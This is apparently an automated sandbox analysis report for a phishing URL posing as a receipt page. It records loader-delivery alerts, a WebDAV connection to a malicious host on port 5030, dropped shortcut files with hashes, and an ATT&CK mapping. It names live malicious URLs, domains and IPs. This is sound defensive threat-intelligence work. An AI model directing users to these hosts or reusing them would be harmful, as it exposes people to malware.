Edit tour

Windows Analysis Report
https://caringforyousupport.com.au/Receipt536354.php

Overview

General Information

Sample URL:	https://caringforyousupport.com.au/Receipt536354.php
Analysis ID:	1591304
Infos:

Detection

WinSearchAbuse

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Suricata IDS alerts for network traffic

Yara detected WinSearchAbuse

Chrome launches external ms-search protocol handler (WebDAV)

Uses known network protocols on non-standard ports

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64

chrome.exe (PID: 3668 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1772 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1960,i,11034920295677954142,14966904882393633339,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://caringforyousupport.com.au/Receipt536354.php" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_60	JoeSecurity_WinSearchAbuse	Yara detected WinSearchAbuse	Joe Security

HTML

Source	Rule	Description	Author	Strings
0.0.pages.csv	JoeSecurity_WinSearchAbuse	Yara detected WinSearchAbuse	Joe Security

Suricata Signatures

ET MALWARE PeakLight/Emmenhtal Loader Payload Delivery Template Observed

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T21:14:02.042595+0100	2058178	1	A Network Trojan was detected	27.123.25.1	443	192.168.2.5	49714	TCP

ET MALWARE PeakLight/Emmenhtal Loader Payload Delivery WebPage Observed

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T21:14:02.042595+0100	2058179	1	A Network Trojan was detected	27.123.25.1	443	192.168.2.5	49714	TCP

ET MALWARE PeakLight/Emmenhtal Loader Payload Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T21:14:25.971613+0100	2055990	1	A Network Trojan was detected	192.168.2.5	49825	154.216.17.175	5030	TCP

Joe Security ANOMALY Microsoft Office WebDAV Discovery

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T21:14:16.673169+0100	1810005	1	Potentially Bad Traffic	192.168.2.5	49768	154.216.17.175	5030	TCP
2025-01-14T21:14:20.547515+0100	1810005	1	Potentially Bad Traffic	192.168.2.5	49793	154.216.17.175	5030	TCP
2025-01-14T21:14:27.158655+0100	1810005	1	Potentially Bad Traffic	192.168.2.5	49833	104.16.230.132	443	TCP

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 408Date: Tue, 14 Jan 2025 20:14:26 GMTServer: WsgiDAV/4.3.0 Cheroot/9.0.0 Python/3.11.1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 27 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 27 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 3c 70 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3a 20 2f 31 42 32 30 47 42 53 55 42 4e 53 41 46 47 45 56 41 2f 54 68 75 6d 62 73 2e 64 62 3c 2f 70 3e 0a 3c 68 72 2f 3e 0a 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 61 72 31 30 2f 77 73 67 69 64 61 76 2f 27 3e 57 73 67 69 44 41 56 2f 34 2e 33 2e 30 3c 2f 61 3e 20 2d 20 32 30 32 35 2d 30 31 2d 31 34 20 31 32 3a 31 34 3a 32 36 2e 35 37 33 32 31 39 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'><html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title></head><body> <h1>404 Not Found</h1> <p>404 Not Found: /1B20GBSUBNSAFGEVA/Thumbs.db</p><hr/><a href='https://github.com/mar10/wsgidav/'>WsgiDAV/4.3.0</a> - 2025-01-14 12:14:26.573219</body></html>

Source: chromecache_60.2.dr

String found in binary or memory: https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833

Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.5:49833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.5:49840 version: TLS 1.2

Source: classification engine

Classification label: mal72.troj.expl.evad.win@17/11@9/7

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1960,i,11034920295677954142,14966904882393633339,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://caringforyousupport.com.au/Receipt536354.php"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1960,i,11034920295677954142,14966904882393633339,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Persistence and Installation Behavior

Chrome launches external ms-search protocol handler (WebDAV)

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File opened: \Device\RdpDr\;:1\alljsnybsafva.living@5030\DavWWWRoot			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File opened: \Device\RdpDr\;:1\alljsnybsafva.living@5030\DavWWWRoot			Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 5030
Source: unknown	Network traffic detected: HTTP traffic on port 5030 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 5030
Source: unknown	Network traffic detected: HTTP traffic on port 5030 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 5030 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 5030 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 5030 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 5030 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 5030 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 5030
Source: unknown	Network traffic detected: HTTP traffic on port 5030 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 5030 -> 49831

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	3 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://caringforyousupport.com.au/Receipt536354.php	100%	Avira URL Cloud	phishing

Name	IP	Active	Malicious	Reputation
caringforyousupport.com.au	27.123.25.1	true	true	unknown
winaero.com	68.183.112.81	true	false	high
www.google.com	142.250.186.100	true	false	high
alljsnybsafva.living	154.216.17.175	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png	false		high
https://caringforyousupport.com.au/Receipt536354.php	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
68.183.112.81	winaero.com	United States	14061	DIGITALOCEAN-ASNUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
154.216.17.175	alljsnybsafva.living	Seychelles	135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	true
142.250.186.100	www.google.com	United States	15169	GOOGLEUS	false
27.123.25.1	caringforyousupport.com.au	Australia	38719	DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	true

Private

IP
192.168.2.16
192.168.2.5

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1591304
Start date and time:	2025-01-14 21:12:59 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://caringforyousupport.com.au/Receipt536354.php
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.troj.expl.evad.win@17/11@9/7

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.67, 142.250.186.174, 142.251.168.84, 142.250.186.78, 172.217.16.206, 142.250.181.238, 199.232.210.172, 2.17.190.73, 172.217.18.110, 142.250.184.238, 172.217.18.3, 2.23.242.162, 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, scan-interpreted-roman-glad.trycloudflare.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://caringforyousupport.com.au/Receipt536354.php

Input	Output
URL: https://caringforyousupport.com.au Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://caringforyousupport.com.au
URL: https://caringforyousupport.com.au/Receipt536354.php Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://caringforyousupport.com.au/Receipt536354.php Model: Joe Sandbox AI	{ "brands": "unknown" }

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 19:13:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9736134530866947
Encrypted:	false
SSDEEP:	48:8kd5ThhfiMwHyidAKZdA19ehwiZUklqehHy+3:8izfiM9Ay
MD5:	CA1B69817EE5CFB8CCF5017B2E54D70E
SHA1:	C050E5A8FCACA27D1BC541A9644150A49D901B10
SHA-256:	3DBCA18A45DACA7078951DDF5131A59846A5F7E9DE8BA101CB6C1529AAAF2581
SHA-512:	A940A1E84E76C27052DCC4AB4B685CA220CCE47A5EDD37D3F8878484955D459B5BF33ED9A2FD08A2785F4857546C05AAFB9781AF5A3D0DDF4214C035F0BFFB00
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....Ww..f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............_j......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 19:13:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9894279328418687
Encrypted:	false
SSDEEP:	48:85d5ThhfiMwHyidAKZdA1weh/iZUkAQkqehwy+2:8tzfiM39QFy
MD5:	CB047C6529F230962F99C83AFA794633
SHA1:	1302E4D45437582C0C61C797E6BD7CB6093F19A9
SHA-256:	25A3FC908BCE40C54B79FCEA16DC0D342243D5E40096AF6B4A1A3B2A08DBA495
SHA-512:	09BCD090C25F111B3459157B98DD55DB899BD1783FD3FC958A0419E7F1A4C5BBBCC5214542E7135D15F14B3AEF96FB441B72BB5FE8EF06F1FD8BB48E8BE254D9
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......i..f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............_j......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.002750926284641
Encrypted:	false
SSDEEP:	48:8xqd5ThhfsHyidAKZdA14tseh7sFiZUkmgqeh7sOy+BX:8xYzfDnEy
MD5:	B5DF6FDC6F2E544879069E08124BC008
SHA1:	A6021A9FC85DE6BFFF9AE4594A349889BA66DAFB
SHA-256:	583F349AC86B05F909A774B3BB92FDFDB7C08533FFF133A1FA769C47A358836D
SHA-512:	CF0B6AA33B09F1F4762698972632B452C964D87D75C3B6C67725BBA35EFE941EC57316CA719B1BA969C7F756AC17C1D129748D80B07060C08370B51E8AE59D02
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............_j......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 19:13:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9867523532164224
Encrypted:	false
SSDEEP:	48:8sd5ThhfiMwHyidAKZdA1vehDiZUkwqehMy+R:8qzfiM02y
MD5:	E8DBB5D1C1047CA0EA3F71FDAA968BC5
SHA1:	B2C70AC976544220942CED1F32E99D12C6B90282
SHA-256:	AEDD1093296D5D857B18B00B2A96412950CAA9342C825DC7606A9521F2BCE21D
SHA-512:	B00225F133D5DC6CAFB44890AD262B3AF6A26274CB498D8A918C9634EB867E0CB882F1DA6BC3960DABC78AA5F05B9E400F6630C10B8F9C241EC61AF79E29B412
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....3Dd..f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............_j......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 19:13:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.977179589330844
Encrypted:	false
SSDEEP:	48:83d5ThhfiMwHyidAKZdA1hehBiZUk1W1qehiy+C:8rzfiMU9Cy
MD5:	51CBCE49CBDEF6F57661518C08C72083
SHA1:	813049A8E3019B55569034B0FC94D399AECF3919
SHA-256:	FEF70DD2DF37681B5AADF0D8E598FF9493920D08A715AD4D362FEEC16C2D4504
SHA-512:	AE1B4FDA376487FAC912D62238B42EBDE16020695CF409327CA2994F65819332A7A54BFE7864A02FECF8A2CE5310968D33C6DEAB7206CB2655EA77DAB71EF665
Malicious:	false
Reputation:	low
